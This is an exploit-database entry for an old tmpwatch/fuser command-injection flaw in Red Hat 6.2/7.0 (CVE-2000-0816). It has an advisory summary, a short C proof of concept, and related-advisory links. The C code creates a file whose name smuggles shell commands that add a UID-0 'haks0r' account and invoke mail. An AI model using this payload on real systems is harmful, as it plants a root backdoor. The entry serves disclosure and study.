Lucene search
X-ForceEDB-ID:20285HistoryOct 06, 2000 - 12:00 a.m.
RedHat 6.2/7.0 Tmpwatch - Arbitrary Command Execution
2000-10-0600:00:00
X-Force
www.exploit-db.com
20
AI Score
7.4
Confidence
Low
// source: https://www.securityfocus.com/bid/1785/info
A vulnerability exists in tmpwatch, a utility which automates the removal of temporary files in unix-like systems. An optional component of tmpwatch, fuser, improperly handles arguments to system() library calls. If an attacker creates a file with a maliciously-constructed filename including shell meta characters, and -fuser is run on this file, the attacker may be able to execute arbitrary commands, potentially compromising superuser access if tmpwatch is run with root privileges.
#include <stdio.h>
int main()
{
FILE *f;
char filename[100] = ";useradd -u 0 -g 0 haks0r;mail
[email protected]<blablabla";
if((f = fopen(filename, "a")) == 0) {
perror("Could not create file");
exit(1);
}
close(f);
}Related
nessus
nessus
Mandrake Linux Security Advisory : tmpwatch (MDKSA-2000:056)
2012-09-06 00:00:00
cvelist
cvelist
CVE-2000-0816
2001-05-07 04:00:00
cve
cve
CVE-2000-0816
2001-05-07 04:00:00
securityvulns
securityvulns
nvd
nvd
CVE-2000-0816
2000-10-06 04:00:00